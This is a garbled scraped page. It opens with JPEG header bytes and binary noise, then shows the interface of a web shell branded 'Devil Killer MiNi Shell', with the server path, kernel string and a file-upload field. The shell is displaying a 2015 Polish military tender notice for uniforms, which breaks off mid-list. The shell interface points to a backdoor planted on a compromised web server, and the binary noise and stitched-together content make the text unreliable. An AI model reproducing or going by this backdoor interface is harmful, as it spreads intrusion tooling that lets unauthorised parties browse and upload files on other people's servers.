JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150518/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150518/116444-N-2015.html

<p class="kh_header"><b>Warszawa: Dostawa umundurowania służbowego dla Jednostki Wojskowej Nr 6021. Sprawa 29/2015/PN/M</b><br>
<b>Numer ogłoszenia: 116444 - 2015; data zamieszczenia: 18.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 6021 , ul. Żwirki i Wigury 9/13, 00-909 Warszawa, woj. mazowieckie, tel. 22 684 75 81, faks 22 684 75 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ozgst.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: JEDNOSTKA WOJSKOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa umundurowania służbowego dla Jednostki Wojskowej Nr 6021. Sprawa 29/2015/PN/M.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: dostawę umundurowania służbowego dla Jednostki Wojskowej Nr 6021.
Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ. ZAMAWIAJĄCY dopuszcza składanie ofert częściowych, z których każda będzie oceniana przez ZAMAWIAJĄCEGO oddzielnie, według zasad opisanych w SIWZ. Zamówienie podzielone zostało na części, zgodnie z opisem zawartym w załączniku Nr 1 do SIWZ. Każdy z WYKONAWCÓW może złożyć ofertę na dowolnie wybraną część. Poszczególne części przedmiotu zamówienia muszą być zgodne z wymaganą liczbą asortymentu i w ilościach określonych w SIWZ. Poszczególne przedmioty zamówienia oraz opakowania powinny być znakowane kodami kreskowymi umieszczonymi na etykietach jednostkowych i etykietach opakowań zbiorczych - zapis dotyczy części od VII do XII zamówienia. Specyfikacja generalna GS1 oraz dokumenty pomocnicze dostępne są na stronach internetowych www.gs1.orgi www.gs1pl.org. Jako dokument pomocniczy do SIWZ załączono Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych stanowiący załącznik Nr 1b do SIWZ. ZAMAWIAJĄCY dopuszcza rozwiązania równoważne normom, aprobatom, specyfikacjom technicznym i systemom odniesienia, o których mowa w art. 30 ust. 1 - 3 ustawy Pzp. WYKONAWCA powołujący się na te rozwiązania jest zobowiązany wykazać, że oferowane dostawy spełniają wymagania określone przez ZAMAWIAJĄCEGO.
Przedmiot zamówienia określono poprzez wskazanie obiektywnych cech jakościowych oraz standardów, dla których określenia dopuszcza się wskazanie przykładowych znaków towarowych. Podane przez ZAMAWIAJĄCEGO nazwy (znaki towarowe) zamawianego asortymentu mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu zamawianego asortymentu, przy czym ZAMAWIAJĄCY dopuszcza składanie ofert równoważnych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 35.81.13.00-5, 18.21.20.00-8, 18.33.20.00-5, 18.23.53.00-8, 18.22.32.00-0, 18.42.20.00-3, 18.44.33.20-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>WYKONAWCA może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych i ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W zakresie potwierdzenia okoliczności, o których mowa w Rozdziale V pkt 3 SIWZ - należy przedłożyć pisemne oświadczenie zawierające zobowiązanie wskazanych podmiotów do oddania WYKONAWCY do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, zgodnie ze wzorem stanowiącym załącznik Nr 8 do SIWZ. Jeżeli WYKONAWCA ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w ust. 2 pkt. 2) SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się przedmiotowych dokumentów, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju w którym WYKONAWCA ma siedzibę lub miejsce zamieszkania lub przed notariuszem. W przypadku wątpliwości, co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu. W przypadku WYKONAWCÓW ubiegających się wspólnie o zamówienie publiczne zastosowanie ma art. 23 ustawy Pzp. WYKONAWCY wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy (lider konsorcjum). Pełnomocnictwo należy dołączyć do oferty. W związku z faktem, iż wszelka korespondencja związana z postępowaniem będzie kierowana do ustanowionego przez WYKONAWCÓW pełnomocnika należy podać adres pełnomocnika (lidera konsorcjum), na jaki ma być wysyłana korespondencja. Pełnomocnictwo dla ustanowionego pełnomocnika (lidera konsorcjum) powinno jednoznacznie wskazywać pełnomocnika, określać zakres pełnomocnictwa oraz termin jego ważności a także precyzować postępowanie, do którego się odnosi. Musi też wskazywać wszystkich WYKONAWCÓW wspólnie ubiegających się o zamówienie i być podpisane przez każdego z nich. W przypadku WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia oświadczenie o spełnieniu warunków dotyczących udziału w postępowaniu WYKONAWCY składają łącznie (załącznik Nr 3 do SIWZ), oświadczenie o braku podstaw do wykluczenia z postępowania (załącznik Nr 4 do SIWZ) oraz Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp (załącznik Nr 5 do SIWZ) składa każdy uczestnik Konsorcjum. Każdy uczestnik Konsorcjum składa aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli oferta WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, ZAMAWIAJĄCY może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych WYKONAWCÓW. Oferta składana przez Spółki cywilne, ustawowo zdefiniowane w art. 860 oraz w art. 864 Kodeksu cywilnego (Dz. U. z 2014 r., poz. 121 ze zm. zgodnie z art. 4 ust. 2 ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej (Dz. U. z 2013 r., poz. 672 ze zm.) jest traktowana, jako oferta WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia publicznego (art. 23 ustawy Pzp) i solidarnie za nie odpowiadających. Forma składanych przez WYKONAWCĘ oświadczeń i dokumentów: Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp (Załącznik Nr 3 do SIWZ) oraz oświadczenie, o którym mowa w Rozdziale V pkt 3 muszą być złożone w oryginale. Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informację o tym, że WYKONAWCA nie należy do grupy kapitałowej (Załącznik Nr 5 do SIWZ) należy złożyć w oryginale. Pełnomocnictwo musi być złożone w oryginale lub w formie kopii poświadczonej notarialnie. Jeżeli oferta podpisana jest przez pełnomocnika, do oferty należy dołączyć dokument pełnomocnictwa, z którego będzie wynikało umocowanie pełnomocnika do złożenia oferty (należy przez to rozumieć osobę umocowaną prawnie do składania oświadczeń woli, zawierania umów, podpisywania ofert i zaciągania zobowiązań w imieniu WYKONAWCY, z zastrzeżeniem art. 106 Kodeksu cywilnego przy właściwości podmiotowej określonej w ustawie o Krajowym Rejestrze Sądowym oraz z zastrzeżeniem art. 95 i nast. Kodeksu cywilnego dla podmiotów podlegających wpisowi do Ewidencji Działalności Gospodarczej (art. 14 ust. 2 ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej Dz. U. Nr. z 2004 r. Nr 173. poz. 1807 ze zm.). Wszystkie pozostałe dokumenty, o których mowa w niniejszym Rozdziale, muszą być złożone w formie oryginału lub kopii poświadczonej na każdej stronie za zgodność z oryginałem przez WYKONAWCĘ lub osobę(y) upoważnioną(e) do reprezentowania WYKONAWCY. WYKONAWCY, którzy w określonym terminie nie złożą wymaganych przez ZAMAWIAJĄCEGO oświadczeń i dokumentów o których mowa w Rozdziale VI ust. 1 pkt 1) oraz ust. 2 pkt 1) i 3) lub którzy nie złożyli pełnomocnictw albo, którzy złożyli wymagane przez ZAMAWIAJĄCEGO oświadczenia i dokumenty zawierające błędy, zostaną przez ZAMAWIAJĄCEGO wezwani do ich złożenia w określonym terminie, chyba, że mimo ich złożenia oferta WYKONAWCY podlegałaby odrzuceniu albo konieczne byłoby unieważnienie postępowania. Jeśli mimo wezwania, WYKONAWCA nie uzupełni dokumentów lub złoży dokumenty w niewłaściwej formie, spowoduje to wykluczenie WYKONAWCY (art. 24 ust. 2 pkt. 4 ustawy Pzp) i odrzucenie oferty (art. 24 ust. 4 ustawy Pzp). ZAMAWIAJĄCY może zwrócić się do WYKONAWCY o udzielenie wyjaśnień dotyczących powiązań, o których mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp, istniejących miedzy przedsiębiorcami, w celu ustalenia, czy zachodzą przesłanki wykluczenia WYKONAWCY. ZAMAWIAJACY, oceniając wyjaśnienia, weźmie pod uwagę obiektywne czynniki, w szczególności wpływ powiązań, o których mowa w art. 24 ust. 2 pkt 5, istniejących miedzy przedsiębiorcami, na ich zachowania w postępowaniu oraz przestrzeganie zasady uczciwej konkurencji. ZAMAWIAJĄCY wyklucza z postępowania o udzielenie zamówienia WYKONAWCĘ, który nie złożył wyjaśnień, oraz WYKONAWCĘ, który nie złożył listy, o której mowa w art. 26 ust. 2d ustawy Pzp.11. Złożenie przez WYKONAWCĘ nieprawdziwych informacji mających wpływ na wynik prowadzonego postępowania spowoduje wykluczenie go z postępowania (art. 24 ust. 2, pkt. 3 ustawy Pzp) i uznanie jego oferty za odrzuconą (art. 24 ust. 4 ustawy Pzp).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ozgst.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warszawa, ul. Żwirki i Wigury 9/13, budynek Nr 11 pok. 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2015 godzina 10:00, miejsce: Warszawa, ul. Żwirki i Wigury 9/13, budynek Nr 21, Kancelaria Jednostki Wojskowej Nr 6021.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021: 
Mundur służbowy oficerski wojsk lotniczych ze spodniami do butów KRWP wz. 92.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ. 
Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego, opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.13.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021:
Mundur służbowy oficerski marynarki wojennej KRWP wzór 92.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ.
Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego, opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.13.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021:
Mundur wyjściowy marynarski KRWP (bluza i spodnie).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ. 
Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego, opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.13.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021:
Płaszcz sukienny oficerski marynarki wojennej KRWP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ. 
Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego, opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.21.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021: 
1)	Ubiór wieczorowy oficerski - damski
2)	Ubiór wieczorowy oficerski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ. 
